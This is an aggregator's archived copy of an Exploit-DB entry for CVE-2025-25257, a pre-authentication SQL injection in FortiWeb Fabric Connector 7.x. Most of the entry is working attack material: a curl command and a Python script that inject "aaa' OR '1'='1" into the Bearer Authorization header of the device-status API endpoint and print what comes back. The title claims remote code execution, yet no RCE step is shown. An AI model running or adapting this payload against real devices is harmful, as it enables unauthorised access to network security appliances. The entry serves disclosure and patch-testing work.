CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ⬡ Vulnerabilities & CVEs

[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution

Exploit DB Archived Mar 16, 2026 ✓ Full text saved

FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution

Full text archived locally
✦ AI Summary · Claude Sonnet

    EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution EDB-ID: 52473 CVE: 2025-25257 EDB Verified: Author: MILAD KARIMI (EX3PTIONAL) Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-02-04 Vulnerable App: # Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL Injection to Remote Code Execution # Date: 2025-10-05 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win, Ubuntu # CVE : CVE-2025-25257 Overview CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x. This flaw allows attackers to inject malicious SQL commands into the vulnerable API endpoint, potentially leading to Remote Code Execution (RCE). PoC curl -k -H "Authorization: Bearer aaa' OR '1'='1" \ https://<fortiweb-ip>/api/fabric/device/status PoC Python import requests def test_sqli(base_url): url = f"{base_url}/api/fabric/device/status" headers = { "Authorization": "Bearer aaa' OR '1'='1" } try: response = requests.get(url, headers=headers, verify=False, timeout=10) print(f"Status code: {response.status_code}") print("Response body:") print(response.text) except Exception as e: print(f"Error: {e}") if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL CVE-2025-25257 FortiWeb") parser.add_argument("base_url", help="Base URL of FortiWeb (ex: https://10.0.0.5)") args = parser.parse_args() test_sqli(args.base_url) # python3 src/poc.py https://10.0.0.5 Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services
    💬 Team Notes
    Article Info
    Source
    Exploit DB
    Category
    ⬡ Vulnerabilities & CVEs
    Published
    Archived
    Mar 16, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗